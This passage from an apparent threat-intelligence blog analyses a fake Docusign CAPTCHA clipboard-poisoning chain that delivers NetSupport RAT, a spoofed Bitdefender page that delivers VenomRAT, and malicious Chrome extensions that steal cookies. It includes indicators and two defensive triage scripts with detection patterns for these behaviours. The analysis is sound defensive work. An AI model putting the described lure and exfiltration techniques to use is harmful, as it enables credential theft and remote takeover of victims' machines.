  • namecheaphosting[.]com

SSL Issuer: WE1

Website Title contains Gitcodes


Fake Docusign CAPTCHAs Used to Deploy NetSupport RAT

Pivoting on the NetSupport RATs being distributed and the associated infrastructure, additional malware distribution domains were identified, including spoofed Docusign websites. As with the Gitcodes sites, multiple stages of script downloaders were observed, resulting in NetSupport RAT being installed on victim machines.

An initial payload retrieves an “s.php” file from a domain spoofing Docusign. It then unzips the file and launches a script within it.

docusign.sa[.]com

The main malicious functionality is present in “docusign.sa[.]com/verification/s.php,” which is initially ROT13 encoded, likely as obfuscation to avoid signature detection. ROT13, or rotate 13, is a form of Caesar cipher in which a simple letter substitution replaces each letter with the 13th letter after it in the alphabet. Applying the operation twice effectively decodes the text.

The page is designed to look like a Cloudflare “Checking your browser” / CAPTCHA page, mixed with Docusign branding. The initial screen presents a fake CAPTCHA checkbox (.captcha-check). Upon clicking, “s.php?an=0” is requested, likely to log the click attempt. The page then initiates clipboard poisoning, in which an “unsecuredCopyToClipboard()” function is called, copying an encoded multi-layered string to the user’s clipboard. The user is instructed to press Win+R, Ctrl+V, Enter; in other words, to open the Windows Run prompt, paste in the malicious script, and run it.

Also on the s.php page, after the clipboard poisoning, an interval timer is set to make an AJAX GET request to c.php every second. If c.php returns "1," the current page (s.php) reloads (window.location.reload()). This is likely a C2 (Command and Control) mechanism waiting for the victim to paste and run the PowerShell script on their machine. 

The string copied to the user’s clipboard decodes to the following PowerShell script:

This script downloads a persistence payload, “wbdims.exe,” from GitHub. It then starts it as a process and creates a COM object for Windows Script Host, which it uses to create a shortcut in the Startup folder so that the payload executes automatically when the user logs in.

While this payload was no longer available during the time of investigation, the expectation is that it checks in with the delivery site via “docusign.sa[.]com/verification/c.php.” Upon doing so, it triggers a refresh in the browser for the page to display the content of “docusign.sa[.]com/verification/s.php?an=1.”

The initial clipboard poisoning delivered a first-stage PowerShell downloader. The refresh of s.php (to s.php?an=1) delivers this second-stage PowerShell script, which then downloads and executes a third-stage payload (jp2launcher.exe from the zip file) retrieved by passing “an=2” argument to the same php page “docusign.sa[.]com/verification/s.php?an=2.”

Downloaded Zip File: 254732635529a0567babf4f78973ad3af5633fd29734ea831e5792292bbf16cd

The script then unzips the file and starts a process called “jp2launcher.exe”, which subsequently, goes through additional stages of file retrievals and executions resulting in a NetSupport RAT (3acc40334ef86fd0422fb386ca4fb8836c4fa0e722a5fcfa0086b9182127c1d7) being installed on the victim machine with these associated network actions:

http[:]//mhousecreative[.]com

http[:]//170.130.55[.]203:443/fakeurl.htm

In summary, the fake Docusign website is likely distributed via phishing attempts over email and/or social media. It is the beginning of an elaborate multi-stage NetSupport RAT delivery method that relies upon deceiving users into “verifying they are human” by copying and running a malicious PowerShell script on their machines. The multiple stages of scripts downloading and running scripts, which download and run yet more scripts, are likely an attempt to evade detection and to be more resilient to security investigations and takedowns.

By breaking the attack into small, distinct steps, the attacker increases the chance that at least one stage will slip past initial signature-based defenses. Additionally, the early phase persistence files appear to be short lived or quickly identified and taken down, however the subsequent later stages appear to be active for longer time frames. This demonstrates the method's somewhat effective disposable pawn strategy with a more resilient late game setup. 

The Widening Scope of Clipboard Poisoning Attacks

While the use of ROT13 encoding can make some detections more difficult, particularly when depending on services that attempt to preprocess server scan data, the samples themselves allow for more unique identification such as the consistent use of the same strings and comment values within the php code. 
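A triage helper for fetched lure pages, as an added example that is not DomainTools' code, illustrating the point above and the s.php behaviour described earlier: a ROT13-served body is decoded first, and the decoded text is then matched against the constant strings the write-up names (the .captcha-check element, unsecuredCopyToClipboard(), the s.php?an=0 request, the c.php polling loop and the Win+R / Ctrl+V / Enter instructions). SAMPLE_PAGE is a constructed fixture with the payload omitted; SERVED_PAGE is that fixture ROT13-encoded the way the live page was.

```python
"""Triage helper for "prove you are human" paste-and-run lure pages.

Added example, not DomainTools' code. The encoding hides the strings from a
naive grep of the raw response, but once decoded the kit's fixed names still
identify it.
"""
import codecs
import re

# Constant strings from the write-up; matched after decoding, so ROT13 on the wire does not hide them
INDICATORS = [
    ("fake_captcha_checkbox", re.compile(r"captcha-check")),
    ("clipboard_copy_function", re.compile(r"unsecuredCopyToClipboard\s*\(")),
    ("click_logging_request", re.compile(r"s\.php\?an=0")),
    ("c_php_polling", re.compile(r"setInterval\s*\(.*?c\.php", re.S)),
    ("reload_on_checkin", re.compile(r"window\.location\.reload\s*\(")),
    ("run_prompt_instructions",
     re.compile(r"Win\s*\+\s*R.*?Ctrl\s*\+\s*V.*?Enter", re.S | re.I)),
]


def looks_rot13_encoded(text):
    """ROT13 turns '<html' into '<ugzy'; that tag with no plain one means the page was served encoded."""
    lowered = text.lower()
    return "<ugzy" in lowered and "<html" not in lowered


def normalize(text):
    """Plain-text form of the page, decoding ROT13 only when the heuristic fires."""
    return codecs.decode(text, "rot13") if looks_rot13_encoded(text) else text


def scan_page(text):
    """Decode if needed, then report which indicators appear and a simple verdict."""
    encoded = looks_rot13_encoded(text)
    body = normalize(text)
    hits = [label for label, rx in INDICATORS if rx.search(body)]
    verdict = "likely_paste_and_run_lure" if len(hits) >= 3 else "inconclusive"
    return {"rot13": encoded, "hits": hits, "verdict": verdict}


# Constructed fixture: the markup pattern from the write-up with the payload omitted
SAMPLE_PAGE = """<html><head><title>Docusign - Verify you are human</title></head>
<body>
<div class="captcha-check" onclick="verify()">I am human</div>
<div id="steps" style="display:none">Press Win+R, then Ctrl+V, then Enter</div>
<script>
function verify() {
  fetch("s.php?an=0");                       // logs the click
  unsecuredCopyToClipboard("<payload omitted>");
  setInterval(function () {
    $.get("c.php", function (r) { if (r == "1") window.location.reload(); });
  }, 1000);
}
</script>
</body></html>"""
SERVED_PAGE = codecs.encode(SAMPLE_PAGE, "rot13")   # what the server actually returned
BENIGN_PAGE = "<html><body><h1>Welcome</h1><p>Nothing to verify here.</p></body></html>"

if __name__ == "__main__":
    for name, page in (("served", SERVED_PAGE), ("benign", BENIGN_PAGE)):
        print(name, scan_page(page))
```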

Pivots on the clipboard poisoning scripts identified several other nearly identical instances of the code on a wider range of spoofed content, including Okta and popular media apps. Additionally, Discord and GitHub were also identified as hosting the next-stage malware.


While attribution of this campaign is unclear, pivots on the associated infrastructure and malware identified reuse of the associated NetSupport RAT hashes, similar delivery URL patterns, and similar domain naming and registration patterns observed in a previously reported cluster of SocGholish activity. Notably, the techniques involved are commonplace, and NetSupport Manager is a legitimate administration tool known to be leveraged as a RAT by multiple threat groups such as FIN7, Scarlet Goldfinch, STORM-0408 and others.

Key Takeaways and Security Recommendations

This analysis highlights a sophisticated and persistent malicious campaign designed to deliver the NetSupport RAT through deceptive means, primarily leveraging spoofed Gitcodes and fake Docusign verification pages. The attackers employ a multi-stage approach, using seemingly innocuous "verify you are human" CAPTCHAs and malicious PowerShell scripts disguised as legitimate prompts to trick users into infecting their own machines. This method capitalizes on user trust and familiarity with common online interactions, such as document verification and code sharing platforms.

Key Security Recommendations:

  • Exercise extreme caution when prompted to copy and paste scripts into the Windows Run prompt: legitimate websites rarely, if ever, require users to execute PowerShell commands directly. Always verify the source and legitimacy of any such requests.
  • Be wary of CAPTCHA-like verifications that instruct you to run commands: genuine CAPTCHAs do not involve running scripts. Any prompt to do so should be treated as highly suspicious.
  • Verify the authenticity of websites: Double-check the URL and SSL certificates of websites, especially those that request sensitive actions or information. Be cautious of lookalike domains.

This campaign serves as a stark reminder of the evolving threat landscape. Attackers are continuously refining their techniques to exploit user behavior and bypass traditional security measures. Vigilance, user education, and proactive security practices are paramount in defending against these increasingly sophisticated threats. The "self-infect" tactic, while seemingly simple, can be highly effective, emphasizing the need for users to remain skeptical and verify all interactions before acting.

IOCs on GitHub

https://github.com/DomainTools/SecuritySnacks/blob/main/2025/prove-you-are-human.csv

If the community has any additional input, please let us know.

Inside a VenomRAT Malware Campaign

A malicious campaign using a fake website to spread VenomRAT, a Remote Access Trojan (RAT), is detailed in this analysis. The malware includes tools for password theft and stealthy access. This research examines the attackers' methods, such as deceptive websites and command infrastructure, indicating a clear intent to target individuals for financial gain by compromising their credentials, crypto wallets, and potentially selling access to their systems.

VenomRAT, StormKitty, and SilentTrinity Deployment

Malicious domain “bitdefender-download[.]com” resolves to a website titled “DOWNLOAD FOR WINDOWS,” which spoofs Bitdefender’s Antivirus for Windows download page.

The left shows the spoofed version of Bitdefender’s Antivirus for Windows download page while the right shows the legitimate page. There are subtle differences between them such as the legitimate page using the word “free” in several places whereas the spoofed version does not.

The “Download For Windows” button initiates a file download from the following bitbucket URL: 

“https[:]//bitbucket[.]org/sadsafsadfsadf/dsfgdsgssdfgdsg/downloads/BitDefender.zip,” 

The bitbucket URL redirects to its content source on Amazon S3.

“https[:]//bbuseruploads.s3.amazonaws[.]com/9e2daa63-bae3-4cbb-9f88-8154ba43261f/downloads/aa7b9593-2ccd-4cd0-9e04-9b4a7da9276b/BitDefender.zip.”

File Name SHA256
BitDefender.zip 59a08decb8b960b65afe4d5446ef0e00e3a49ab747599b5ee6e7d43813040287
StoreInstaller.exe e33b8b32bccfb50f604f06a306d1af89ae7b0d583bca20c41fa5811f526aa420

The bundled executable StoreInstaller.exe was found to contain malware configurations associated with VenomRAT. It also contained code associated with open source post-exploitation framework SilentTrinity and StormKitty stealer.

A report by Acronis describes VenomRAT as a RAT that originated as a fork of the open-source Quasar RAT. It is often used for initial access and persistence. Capabilities include remote access, credential theft, keylogging, exfiltration and more.

At a high level, the three malware families function as follows:

  • VenomRAT provides initial and ongoing access to victim machines
  • StormKitty quickly gathers credentials on the system
  • SilentTrinity is used for exfiltration and stealthy long term access

The inclusion of SilentTrinity and StormKitty (both open-source malware tools) indicates the attacker’s dual focus: rapidly harvesting financial credentials and crypto wallets during initial access, while also establishing stealthy, persistent access for potential long-term exploitation. The implications of long term access may include repeat compromise or selling access.

VenomRAT

Observed VenomRAT configurations showed multiple identifiable attributes that allowed for reliable pivots to other samples likely created by the same actor including the reuse of the same IP and port, 67.217.228[.]160:4449, for command and control.

Related samples using the same VenomRAT configurations:



A reused 3389 service configuration was identified via Shodan “hash:-971903248” allowing for pivots to additional IP addresses with the same configurations. Multiple of the IPs were confirmed to be used as C2s for VenomRAT and are suspected to have also been configured by the same actor.



Credential Harvesting Sites

The lure website domain spoofing as Bitdefender was observed with infrastructure and time proximity overlaps to other malicious domains impersonating banks and generic IT services, suspected of being used for phishing activity. 

NameServer: cloudflare.com

IP ISP: cloudflare.com

Registrar:

  • PDR Ltd
  • GMO Internet
  • NameSilo

SSL Issuer:

  • Cloudflare TLS
  • WE1

Server Type: cloudflare

idram-secure[.]live

Spoofs the Armenian IDBank page.

Clicking through leads to a site titled “ArmCoin” whose content claims to be IDBank.

The text is in Armenian and translates to: “To connect you to Idram Secure, please write to us in the chat. 🎉
Our chat is located in the bottom right corner of the page”

royalbanksecure[.]online

Spoofs the Royal Bank of Canada online banking login portal.

dataops-tracxn[.]com

Spoofs the Microsoft login page.

Protection from Open-Source Malware

This investigation reveals a deceptive campaign using VenomRAT, a powerful remote access tool, disguised as a legitimate Bitdefender antivirus download. Imagine clicking a button on what looks like a trusted site, only to unleash a trio of malicious programs – VenomRAT, StormKitty, and SilentTrinity – onto your system. These tools work in concert: VenomRAT sneaks in, StormKitty grabs your passwords and digital wallet info, and SilentTrinity ensures the attacker can stay hidden and maintain control. We tracked down the attackers' command centers, identified other malware they likely used, and uncovered their web of fake download sites and phishing traps spoofing as banks and online services.

This campaign underscores a constant trend: attackers are using sophisticated, modular malware built from open-source components. This "build-your-own-malware" approach makes these attacks more efficient, stealthy, and adaptable. While the open-source nature of these tools can help security experts spot them faster, the primary victims here are everyday internet users. These criminals are after your hard-earned money, targeting your bank accounts and cryptocurrency wallets with fake login pages and malware disguised as safe software.

This isn't just a problem for big companies – it's a threat to everyone online. So, what can you do?

  • Be extremely cautious when downloading software. Double-check website addresses to make sure they're legitimate, especially for banking or login pages.
  • Never enter your credentials on a site you're not 100% sure about.
  • Practice safe internet habits: avoid clicking on suspicious links or opening unexpected email attachments.

IOCs on GitHub

https://github.com/DomainTools/SecuritySnacks/blob/main/2025/VenomRAT-Malware-Campaign.csv

If the community has any additional input, please let us know.

Hidden Threats of Dual-Function Malware Found in Chrome Extensions

An unknown actor has been continuously creating malicious Chrome browser extensions since approximately February 2024. The actor creates websites that masquerade as legitimate services (productivity tools, ad and media creation or analysis assistants, VPN services, crypto, banking and more) to direct users to install corresponding malicious extensions from Google’s Chrome Web Store (CWS). The extensions typically have dual functionality: they generally appear to work as intended, but also connect to malicious servers to send user data, receive commands, and execute arbitrary code.

Example: A DeepSeek Chrome Extension themed lure website ‘deepseek-ai[.]link’


The extensions analyzed appear to have working or partially working functionality and are commonly configured with excessive permissions to interact with every site the browser visits and retrieve and execute arbitrary code from a network of other actor controlled domains.

While each extension was found to be relatively different, the hosting infrastructure and code structures were consistent. Multiple extensions were observed using a “onreset” event handler trick on a temporary document object model (DOM) element to execute code, likely to bypass content security policy (CSP). The extensions hardcode one of the actor’s API servers, typically in a file named “background.js” or “background.iife.js” or for older extensions “src/pages/background/index.js.” These files were also found to typically contain the majority of the malicious functionality of the extensions.

Registration Patterns for Actor Lure Websites

Common registration patterns were observed going back to October 2024.

  • Registrar: NameSilo, LLC
  • NameServer: cloudflare.com
  • IP ISP: CloudFlare Inc.
  • SSL Issuer Common Name: WE1
  • Registrant: Domain Administrator
  • Server Type:
    • cloudflare
    • proxygen-bolt
  • MX Server: cloudflare.net

Additionally, Facebook tracker IDs were commonly present on the lure sites.


The following are a sampling of the lure websites, which cover a wide range of topics and themes. The full list of identified domains is provided on GitHub.

Malicious Extensions

It’s worth noting that the extensions appear to be at least partly functional as it relates to the theme of their lure. However, where extensions interact with third-party services to provide that functionality, such as FortiVPN or DeepSeek AI, they hard-code the third-party API keys into the extension code, an extremely poor security practice.

Example 1: Lure Site of Manus AI to Install an AI Assistant Extension

Lure Domain: manusai[.]sbs

Extension Name: manus-ai-free-ai-assistan

Extension ID: aeibljandkelbcaaemkdnbaacppjdmom

CWS:  https[:]//chromewebstore.google[.]com/detail/manus-ai-free-ai-assistan/aeibljandkelbcaaemkdnbaacppjdmom

Extension Filename: aeibljandkelbcaaemkdnbaacppjdmom.crx

Extension File Sha256: 3131d15ebea5eb68e636eb804b2de86cc04d8be5d1257c83f2042a391b8e9415

Actor API Domain: api.sprocketwhirl[.]top

The first things to note about the extension are the extensive permissions it attempts to grant itself in the manifest.json file.


The “background.js” script fetches and applies declarativeNetRequest rules from the backend. This allows the author to modify network requests (block, redirect, modify headers) after the extension is installed, bypassing Chrome Web Store review for those changes. This could be used for malicious redirects, ad injection, or tracking.

The background script communicates with api.sprocketwhirl[.]top, sending encrypted system information (platform, language, memory, cores, timezone, IP, country code) and receiving dynamic declarativeNetRequest rules and potentially executable code.

The content script (injected into all pages) executes arbitrary code retrieved from chrome.storage.local (report key), which was placed there by the background script after fetching it from api.sprocketwhirl[.]top.

Example 2: Lure Site of FortiVPN Client Extension

Lure Domain: forti-vpn[.]com

Extension Name: fortivpn

Extension ID: ccollcihnnpcbjcgcjfmabegkpbehnip

CWS: https[:]//chromewebstore.google[.]com/detail/fortivpn/ccollcihnnpcbjcgcjfmabegkpbehnip

Extension Filename: ccollcihnnpcbjcgcjfmabegkpbehnip.crx

Extension File Sha256: f4fe36cdc9bd1f16d9385e56155aca3723a267bcdf575e925e20bb9a6526b576

Actor API Domain: api.infograph[.]top

The extension also attempts to grant itself extensive permissions as seen from its manifest.json file.


The extension has a dual functionality in which it provides some of the advertised purpose. In this case, a browser extension based VPN service by connecting to wss[:]//leviathan.whale-alert[.]io/ws using a hardcoded API key. At the same time, however, the extension also connects to a malicious backend client wss[:]//api.infograph[.]top/api and listens for commands. It uses a websocket keep-alive mechanism to maintain connectivity to the backend server as well as sending periodic ping and report messages.

When commanded, it uses chrome.cookies.getAll({}) to retrieve all browser cookies, compresses them using pako, encodes them in Base64, and sends them back to the backend infograph[.]top server.

It can be commanded to establish a separate WebSocket connection to act as a network proxy, potentially routing the user’s traffic through malicious servers. The proxy target is provided by the backend command and also implements proxy authentication handling.

The extension fetches arbitrary scripts from an actor-controlled server. It then injects the scripts into active browser tabs by using chrome.tabs.sendMessage to the tab’s content scripts, triggering their execution within the tabs.

Additionally, the extension enables dynamic network rules via setup response from the backend that can contain declarativeNetRequest rules which are then applied, allowing the backend to modify network traffic post-install.

Example 3: Lure of SiteStats Extension

Lure Domain: sitestats[.]world

Extension Name: site-stats

Extension ID: fcfmhlijjmckglejcgdclfneafoehafm

CWS: https[:]//chromewebstore.google[.]com/detail/site-stats/fcfmhlijjmckglejcgdclfneafoehafm?pli=1

Extension Filename: fcfmhlijjmckglejcgdclfneafoehafm.crx

Extension File Sha256: d6e179dcab901e81b3340aebaa3e517bb98b09f9fea01e667e594416c10efc44

Actor API Domain: api.zorpleflux[.]top

Like the previous examples, this extension also grants itself extensive permissions and script execution on every site as seen from its manifest.json file.

The extension can modify network requests via declarativeNetRequest rules. It also holds the webRequest capability, which is primarily observational in Manifest V3, but combined with broad host permissions it can still be used for tracking or reconnaissance.

Like the other extensions identified, it connects to an actor-controlled backend server, api.zorpleflux[.]top, defined in the “background.iife.js” file, and sends periodic ping and report messages to it.

On command from the backend, it can set up a secondary proxy WebSocket connection that routes traffic through the user’s browser. This works as a reverse proxy: proxied requests are carried out via fetch, the responses are compressed with pako, and the result is relayed back to the backend.

The extension also executes arbitrary scripts received from the backend server, using chrome.tabs.sendMessage to hand them to the content script declared in manifest.json, which runs them in the page.
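The behaviours attributed to the FortiVPN and SiteStats extensions above (broad permissions, cookie collection, a WebSocket command channel, script relay to content scripts, dynamic declarativeNetRequest rules) can be pre-screened statically before an extension reaches a user. The following is an added triage script, not code from the original post or from the extensions it describes; the function name triageExtension, the indicator list, and the sample manifest and background snippet are constructed for this example, and the sample backend hostname is a placeholder.

```javascript
// Added triage example (not code from the original post or from the
// extensions it analyses). Static pre-screen of an unpacked Chrome extension
// that flags the permission and API combinations the write-up describes.

// Permissions whose presence alone merits a closer look.
const RISKY_PERMISSIONS = new Set([
  "cookies", "proxy", "webRequest", "declarativeNetRequest",
  "declarativeNetRequestWithHostAccess", "scripting",
]);
// Host patterns that grant access to every site.
const BROAD_HOSTS = new Set(["<all_urls>", "*://*/*", "http://*/*", "https://*/*"]);

// Source-level indicators. Each is an observable the analysis attributes to
// the extensions, not proof of malice on its own.
const CODE_INDICATORS = [
  { id: "cookie-dump", re: /chrome\.cookies\.getAll\s*\(\s*\{\s*\}/, why: "reads every cookie in the browser" },
  { id: "dynamic-dnr", re: /declarativeNetRequest\.updateDynamicRules/, why: "network rules can change after install" },
  { id: "tab-relay",   re: /chrome\.tabs\.sendMessage/, why: "background relays data to content scripts" },
  { id: "compress",    re: /pako\.(deflate|gzip)/, why: "payloads compressed before transmission" },
];
// Captures the scheme and host of every WebSocket the background script opens.
const WS_RE = /new\s+WebSocket\s*\(\s*["'`](wss?:\/\/[^\/"'`]+)/g;

function triageExtension(manifestText, backgroundSource) {
  const manifest = JSON.parse(manifestText);
  const findings = [];

  for (const p of manifest.permissions || []) {
    if (RISKY_PERMISSIONS.has(p)) findings.push({ id: `perm:${p}`, severity: "medium" });
  }
  for (const h of manifest.host_permissions || []) {
    if (BROAD_HOSTS.has(h)) findings.push({ id: "broad-host", severity: "medium" });
  }
  for (const cs of manifest.content_scripts || []) {
    if ((cs.matches || []).some((m) => BROAD_HOSTS.has(m))) {
      findings.push({ id: "content-script-all-sites", severity: "medium" });
    }
  }
  for (const ind of CODE_INDICATORS) {
    if (ind.re.test(backgroundSource)) findings.push({ id: ind.id, severity: "medium", why: ind.why });
  }
  const wsEndpoints = [...backgroundSource.matchAll(WS_RE)].map((m) => m[1]);

  // High severity only for the combinations the analysis describes:
  // a full cookie read with an outbound channel, and a remote channel that
  // feeds content scripts running on every site.
  const ids = new Set(findings.map((f) => f.id));
  if (ids.has("cookie-dump") && wsEndpoints.length) {
    findings.push({ id: "cookie-exfil-channel", severity: "high" });
  }
  if (ids.has("tab-relay") && ids.has("content-script-all-sites") && wsEndpoints.length) {
    findings.push({ id: "remote-script-injection", severity: "high" });
  }
  const verdict = findings.some((f) => f.severity === "high")
    ? "block-and-investigate"
    : findings.length ? "review" : "clean";
  return { verdict, findings, wsEndpoints };
}

// Constructed sample files mirroring the traits described in the write-up.
const SAMPLE_MANIFEST = JSON.stringify({
  manifest_version: 3,
  name: "example-vpn",
  version: "1.0.0",
  permissions: ["cookies", "proxy", "declarativeNetRequest", "storage"],
  host_permissions: ["<all_urls>"],
  background: { service_worker: "background.js" },
  content_scripts: [{ matches: ["<all_urls>"], js: ["content.js"] }],
});
const SAMPLE_BACKGROUND = `
const ws = new WebSocket("wss://api.example-backend.invalid/api"); // placeholder host
chrome.cookies.getAll({}, onCookies);
const blob = pako.deflate(payload);
chrome.declarativeNetRequest.updateDynamicRules(rules);
chrome.tabs.sendMessage(tabId, msg);
`;

console.log(JSON.stringify(triageExtension(SAMPLE_MANIFEST, SAMPLE_BACKGROUND), null, 2));
```

Run it against the unpacked .crx contents (manifest.json plus the background script). None of the individual indicators proves malice; the high-severity findings fire only on the combinations the analysis above describes, and a hit is a reason to pull the package for manual review rather than a verdict in itself.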

Actor API Endpoints

The extensions hardcode one of the actor’s API servers, typically in a file named “background.js” or “background.iife.js”. For example, the lure site deepseek-ai[.]link directs users to install the Chrome extension with ID “pocfdebmmcmfanifcfeeiafokecfkikj”; upon installation, this extension actively communicates with another actor domain, api.glimmerbloop[.]top, to report installation and fingerprinting data and to receive instructions and payloads.

Many of the analyzed extensions had variations in functionality and implementation of the API payload execution steps including what browser fingerprinting information was sent in the initial transaction. The following were consistent elements observed:

  • Hardcoding actor API domain in “background.js” or “background.iife.js” file
  • Use of HMAC with SHA-256 signing algorithm
  • Use of JWT authentication
  • Use of extension ID in UTF-8 bytes format as a secret key to sign the JWT payload
  • Base64 encoding the payload prior to sending to the API server

To establish a connection to the actor’s API server, the extensions build a token using a standard JWT library. The payload combines a UUID, the extension ID, the extension version, and a country code, together with the standard JWT claims Issued At (iat) and Expiration Time (exp). The token is signed with HMAC-SHA256 using a secret key that was consistently observed to be the UTF-8 bytes of the extension ID string. The resulting token is then Base64 encoded with btoa() and sent to the API server as an authentication mechanism to retrieve arbitrary code for the extension to execute.

The domain registration details of the API endpoints were found to be nearly identical to those of the malicious lure websites with the additional commonalities in website title and content.

  • Website Title: SiteName
  • Website Content:

A pivot on these domain registration patterns identified the domains provided at the end of this post, suspected to be owned by the actor and used by malicious extensions. Analysis of several extensions identified hard-coded domains that were all found in the list of identified API domains, further validating the findings.

Fake Websites and Malicious Chrome Extensions

Since at least February 2024, this malicious actor has deployed over 100 fake websites and malicious Chrome extensions with dual functionalities. Analysis revealed these extensions can execute arbitrary code from attacker-controlled servers on all visited websites, enabling credential theft, session hijacking, ad injection, malicious redirects, traffic manipulation, and phishing via DOM manipulation. Some extensions were also observed attempting to steal all browser cookies, which may lead to account compromises.

Notably, the Chrome Web Store has removed several of the actor’s malicious extensions after the malware was identified. However, the actor’s persistence and the time lag between detection and removal pose a threat to users seeking productivity tools and browser enhancements. Malware distributors such as this often exploit current trends, such as the recent DeepSeek AI media attention, to lure users into installing infected extensions, potentially gaining control over their browsing activity and sensitive data.

All users should protect themselves by exercising caution when installing extensions. Stick to the Chrome Web Store and verified developers, carefully review requested permissions, read reviews, and be wary of lookalike extensions. Keep your browser and antivirus software updated, and regularly review your installed extensions, removing any you don’t need or find suspicious. Vigilance is key to avoiding these threats.

IOCs on GitHub

https://github.com/DomainTools/SecuritySnacks/blob/main/2025/DualFunction-Malware-Chrome-Extensions

If the community has any additional input, please let us know.
